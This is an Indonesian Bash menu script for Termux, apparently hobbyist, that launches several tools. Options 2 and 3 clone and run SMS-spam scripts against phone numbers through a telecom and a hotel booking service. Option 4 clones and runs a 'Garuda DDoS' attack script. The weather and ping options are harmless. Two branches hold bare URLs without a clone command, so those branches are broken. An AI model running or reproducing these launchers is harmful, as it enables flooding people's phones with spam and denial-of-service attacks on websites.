while [ $ulang = "y" ]
do
clear

NOW=`date "+%d.%m.%Y"`
TIME=`date "+%H:%M"`

echo "
   \033[0;31m ╔═══╗╔═══╗╔══╗╔═══╗╔═╗─╔╗╔═══╗╔═══╗
   \033[0;32m ║╔══╝║╔═╗║╚╣─╝║╔══╝║║╚╗║║╚╗╔╗║║╔═╗║
   \033[0;33m ║╚══╗║╚═╝║─║║─║╚══╗║╔╗╚╝║─║║║║║╚══╗
   \033[0;34m ║╔══╝║╔╗╔╝─║║─║╔══╝║║╚╗║║─║║║║╚══╗║
   \033[0;37m ║║───║║║╚╗╔╣─╗║╚══╗║║─║║║╔╝╚╝║║╚═╝║
   \033[1;30m ╚╝───╚╝╚═╝╚══╝╚═══╝╚╝─╚═╝╚═══╝╚═══╝
    \033[1;32m  <<\033[1;30m(\033[0;37m $TIME\033[1;30m )\033[1;32m>> <<\033[1;30m( \033[0;37m$NOW\033[1;30m )\033[1;32m>>"
echo "
\033[1;34m╔════╗╔═══════════════════════╗╔════════════╗
║\033[1;32m NO\033[1;34m ║║\033[1;32m      NAMA TOOLS  \033[1;34m     ║║ \033[1;32m  STATUS  \033[1;34m ║
╚════╝╚═══════════════════════╝╚════════════╝
\033[1;31m╔════╗╔═══════════════════════╗╔════════════╗
║\033[1;36m 01\033[1;31m ║║\033[1;37m TOMBOL SPESIAL TERMUX\033[1;31m ║║\033[1;32m    WORK  \033[1;31m  ║
╚════╝╚═══════════════════════╝╚════════════╝
\033[1;31m╔════╗╔═══════════════════════╗╔════════════╗
║\033[1;36m 02\033[1;31m ║║\033[1;37m SPAM SMS TRI\033[1;31m (\033[1;33munli\033[1;31m)  \033[1;31m ║║\033[1;34m  Not Work\033[1;31m  ║
╚════╝╚═══════════════════════╝╚════════════╝
\033[1;31m╔════╗╔═══════════════════════╗╔════════════╗
║\033[1;36m 03\033[1;31m ║║\033[1;37m SPAM SMS OYO HOTEL   \033[1;31m ║║\033[1;32m    WORK  \033[1;31m  ║
╚════╝╚═══════════════════════╝╚════════════╝
\033[1;31m╔════╗╔═══════════════════════╗╔════════════╗
║\033[1;36m 04\033[1;31m ║║\033[1;37m GARUDA DDOS          \033[1;31m ║║\033[1;32m    WORK  \033[1;31m  ║
╚════╝╚═══════════════════════╝╚════════════╝
\033[1;31m╔════╗╔═══════════════════════╗╔════════════╗
║\033[1;36m 05\033[1;31m ║║\033[1;37m PERKIRAAN CUACA      \033[1;31m ║║\033[1;32m    WORK  \033[1;31m  ║
╚════╝╚═══════════════════════╝╚════════════╝
\033[1;31m╔════╗╔═══════════════════════╗╔════════════╗
║\033[1;36m 06\033[1;31m ║║\033[1;37m CEK IP WEBSITE       \033[1;31m ║║\033[1;32m    WORK  \033[1;31m  ║
╚════╝╚═══════════════════════╝╚════════════╝
\033[1;37m"
read -p "[•] PILUHAN : " input

if [ $input = "6" ]
then
clear
echo "\033[0;31m  ╔══╗╔═╗╔══╗╔═╦╗ ╔══╗╔═╗
  ║══╣║╔╝║╔╗║║║║║ ╚║║╝║╬║
\033[1;37m  ╠══║║╚╗║╠╣║║║║║ ╔║║╗║╔╝
  ╚══╝╚═╝╚╝╚╝╚╩═╝ ╚══╝╚╝
\033[1;34m╔══════════════════════════╗
\033[1;36m AUTHOR   : Ivan Firmansyah
 CHANEL YT: Lerry Real
\033[1;34m╚══════════════════════════╝
\033[1;37m"
read -p "[•] WEBSITE TARGET : " web

echo "\033[1;37m"
ping $web

elif [ $input = "5" ]
then
clear
echo "
\033[0;31m     ╔═╗╔╦╗╔══╗╔═╗╔══╗
     ║╔╝║║║║╔╗║║╔╝║╔╗║
\033[1;37m     ║╚╗║║║║╠╣║║╚╗║╠╣║
     ╚═╝╚═╝╚╝╚╝╚═╝╚╝╚╝
\033[1;34m╔══════════════════════════╗
\033[1;36m AUTHOR   : Ivan Firmansyah
 CHANEL YT: Leryy Real
\033[1;34m╚══════════════════════════╝
\033[1;37m"
read -p "[•] LOKASI : " lok
echo ""
curl http://wttr.in/$lok

elif [ $input = "4" ]
then
        git clone https://github.com/F713ND5/garuda_ddos
        cd garuda_ddos
        sh Indonesiaku.sh

elif [ $input = "1" ]
then
        https://github.com/ivan732/tombol-spesial
        cd tombol-spesial
        sh tombol-spesial.sh

elif [ $input = "3" ]
then
        git clone https://github.com/ivan732/spam3
        cd spam3
        sh run.sh

elif [ $input = "2" ]
then
        https://github.com/F713ND5/Spam3unli
        cd Spam3unli
        php Spam3.php
sleep 5
else
        echo "\033[1;36m[\033[1;32m!\033[1;37m] \033[1;31mNOMOR SALAH"
sleep 2
fi
done
